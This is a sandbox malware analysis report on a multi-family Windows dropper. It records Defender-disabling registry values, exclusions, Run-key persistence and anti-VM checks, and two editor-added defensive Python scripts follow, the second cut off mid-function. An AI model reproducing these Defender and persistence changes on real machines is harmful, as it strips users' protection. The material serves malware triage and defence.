Malware Analysis Report

2025-01-23 11:29

Sample ID 231010-2586msgg91
Target 0f790705c38d456af7c8a0147e9c35e4.exe
SHA256 3a1a46d10a40bb66b4472a6afc593cb7708e933e7b5354449cdf47b4d528fc94
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a1a46d10a40bb66b4472a6afc593cb7708e933e7b5354449cdf47b4d528fc94

Threat Level: Known bad

The file 0f790705c38d456af7c8a0147e9c35e4.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia

RedLine payload

Glupteba

Detect Mystic stealer payload

Modifies Windows Defender Real-time Protection settings

Suspicious use of NtCreateUserProcessOtherParentProcess

SectopRAT

Detected google phishing page

DcRat

RedLine

Windows security bypass

SectopRAT payload

Detects Healer an antivirus disabler dropper

Glupteba payload

Healer

Amadey

Mystic

SmokeLoader

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Windows security modification

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Suspicious use of UnmapMainImage

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies system certificate store

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 23:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 23:11

Reported

2023-10-10 23:14

Platform

win7-20230831-en

Max time kernel

164s

Max time network

190s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 544 created 1272 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\842E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\85D5.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\897E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C5E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2B2E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
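Worked example (added by the editor; not output of the sandbox and not code belonging to any of the families tagged above). The Defender rows in the three tables above and the Run/RunOnce rows in this one are rendered as "description path = value process target". The script below parses that layout, maps the NT paths to HKLM/HKU names, tags each write with the ATT&CK technique it evidences (the labels are this example's own mapping, not the report's), and reads the wextract_cleanupN entries as what they are: bookkeeping written by Windows' own wextract.exe self-extractor (the unpacker behind IExpress packages), which registers rundll32 advpack.dll,DelNodeRunDLL32 to delete the IXP00N.TMP extraction directory at next logon. Those rows are a packaging artifact rather than persistence, but they are useful: layer N's setter unpacked into IXP00N.TMP, so the process that sets layer N+1 from inside that directory is its child, and the entries chain the nested droppers for you. The one durable autostart in these tables is the Run\csrss value pointing at C:\Windows\rss\csrss.exe. The Wow6432Node prefix only marks 32-bit writers. The sample rows are copied from the behavioral1 tables of this report; the parser assumes exactly that column layout and the function names are the example's own.

```python
"""Triage the registry rows of a sandbox report (added example, not sandbox output).
Parses rows rendered as 'description path = value process target', normalises the
hive names, tags each write and chains the nested wextract (IExpress) layers."""
import re
from collections import defaultdict

# One rendered row: description, registry path, optional `= value`, writing process, target.
ROW_RE = re.compile(
    r'^(?P<op>Set value \((?:int|str|data)\)|Key created)\s+'
    r'(?P<path>\\REGISTRY\\.*?)'
    r'(?: = (?P<value>"(?:[^"\\]|\\.)*"|\S+))?'
    r'\s+(?P<proc>[A-Za-z]:\\.*?\.(?:exe|EXE))\s+N/A$'
)
HIVES = (("\\REGISTRY\\MACHINE\\", "HKLM\\"), ("\\REGISTRY\\USER\\", "HKU\\"))


def normalise(path):
    """NT kernel path -> Win32 hive name. Wow6432Node is the 32-bit view of the same key."""
    for nt, win32 in HIVES:
        if path.startswith(nt):
            path = win32 + path[len(nt):]
    return path.replace("\\Wow6432Node\\", "\\")


def parse_row(line):
    """Return a dict for one registry row, or None for any other line."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    value = m.group("value")
    if value and value.startswith('"'):  # undo the report's C-style quoting
        value = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return {"op": m.group("op"), "path": normalise(m.group("path")),
            "value": value, "proc": m.group("proc")}


def classify(rec):
    """Tag a write with what it evidences (ATT&CK IDs are this example's mapping)."""
    p, v = rec["path"].lower(), rec["value"]
    if "\\windows defender\\real-time protection\\" in p and v == "1":
        return "T1562.001 defender real-time protection disabled"
    if p.endswith("\\windows defender\\features\\tamperprotection") and v == "0":
        return "T1562.001 defender tamper protection disabled"
    if "\\windows defender\\exclusions\\" in p:
        return "T1562.001 defender exclusion added"
    if "\\windows defender\\" in p:
        return "T1562.001 defender policy key created"
    if re.search(r"\\currentversion\\runonce\\wextract_cleanup\d+$", p):
        # Written by Windows' wextract.exe: deletes IXP00N.TMP at next logon, not persistence.
        return "wextract self-extractor cleanup (packaging artifact)"
    if "\\currentversion\\run\\" in p:
        return "T1547.001 run key persistence"
    return "uncategorised"


def wextract_chains(records):
    """Layer N's setter unpacked into IXP00N.TMP; a layer N+1 setter that lives in that
    directory is its child, so consecutive layers link into one unpacking chain."""
    layers = {}
    for r in records:
        n = re.search(r"\\runonce\\wextract_cleanup(\d+)$", r["path"].lower())
        d = re.search(r"IXP\d{3}\.TMP", r["value"] or "")
        if n and d:
            layers[int(n.group(1))] = (r["proc"], d.group(0))
    chains, prev_dir = [], None
    for n in sorted(layers):
        proc, ext_dir = layers[n]
        if prev_dir and ("\\" + prev_dir + "\\") in proc:
            chains[-1].append(proc)
        else:
            chains.append([proc])
        prev_dir = ext_dir
    return chains


def triage(lines):
    """Parse every row, group findings by writing process, chain the unpacker layers."""
    records = [r for r in map(parse_row, lines) if r]
    findings = defaultdict(list)
    for r in records:
        findings[r["proc"].rsplit("\\", 1)[-1]].append(classify(r))
    return {"records": records, "findings": dict(findings),
            "wextract_chains": wextract_chains(records)}


# Rows copied verbatim from the behavioral1 tables of this report.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\819E.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A',
]
```

Calling triage(SAMPLE_ROWS) groups three Defender tampering writes under 8CE8.exe, an exclusion plus the Run\csrss autostart under 31839b57a4f11171d6abc8bbc4451ee4.exe, and links the four RunOnce rows into two unpacking chains: 0f790705c38d456af7c8a0147e9c35e4.exe -> v4499542.exe, and 819E.exe -> kx4St2pf.exe. Feeding it all seven wextract_cleanup rows from the table above extends the second chain through IB0tc6CQ.exe, Ok8bG1wv.exe and FG2wS5ol.exe, which is the layering the "Executes dropped EXE" list shows only as a flat sequence of IXP00N.TMP paths.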

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
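Worked example (added by the editor; not output of the sandbox). The subkeys under HKLM\SYSTEM\ControlSet001\Enum\SCSI are device instance IDs of the form Disk&Ven_<vendor>&Prod_<product>, readable without elevation, so a stock VirtualBox guest advertises Ven_VBOX to whatever enumerates the key. The enumeration by toolspub2.exe and AppLaunch.exe recorded here and the \??\VBoxMiniRdrDN device probe by 31839b57a4f11171d6abc8bbc4451ee4.exe above are both common VM checks. The script below is the analyst-side counterpart: it scans a .reg export of that key taken from a sandbox image and reports every device ID or FriendlyName that names a hypervisor, so the image can be fixed before it is used for detonation. The export text is constructed for this example and mimics a VirtualBox guest with one physical-looking disk added; the token list and function names are the example's own.

```python
"""Scan a .reg export of HKLM\\SYSTEM\\...\\Enum\\SCSI for hypervisor fingerprints
(added example, not sandbox output)."""
import re

# Vendor/product tokens that betray a VM in SCSI device instance IDs
# (Disk&Ven_<vendor>&Prod_<product>) and in FriendlyName values.
HYPERVISOR_TOKENS = ("vbox", "vmware", "qemu", "xen", "virtual")

KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\(?:ControlSet\d{3}|CurrentControlSet)"
    r"\\Enum\\SCSI\\(?P<dev>[^\]]+)\]$", re.IGNORECASE)
NAME_RE = re.compile(r'^"FriendlyName"="(?P<name>[^"]*)"$', re.IGNORECASE)


def _token(text):
    """First hypervisor token contained in text, or None."""
    low = text.lower()
    return next((t for t in HYPERVISOR_TOKENS if t in low), None)


def hypervisor_artifacts(reg_export):
    """Return (key, field, text, token) for every Enum\\SCSI key or FriendlyName
    that contains a hypervisor token; an empty list means the export is clean."""
    hits, current = [], None
    for line in reg_export.splitlines():
        line = line.strip()
        k = KEY_RE.match(line)
        if k:
            current = k.group("dev")
            tok = _token(current)
            if tok:
                hits.append((current, "device id", current, tok))
            continue
        if line.startswith("["):
            current = None  # a key outside the Enum\SCSI subtree
            continue
        n = NAME_RE.match(line)
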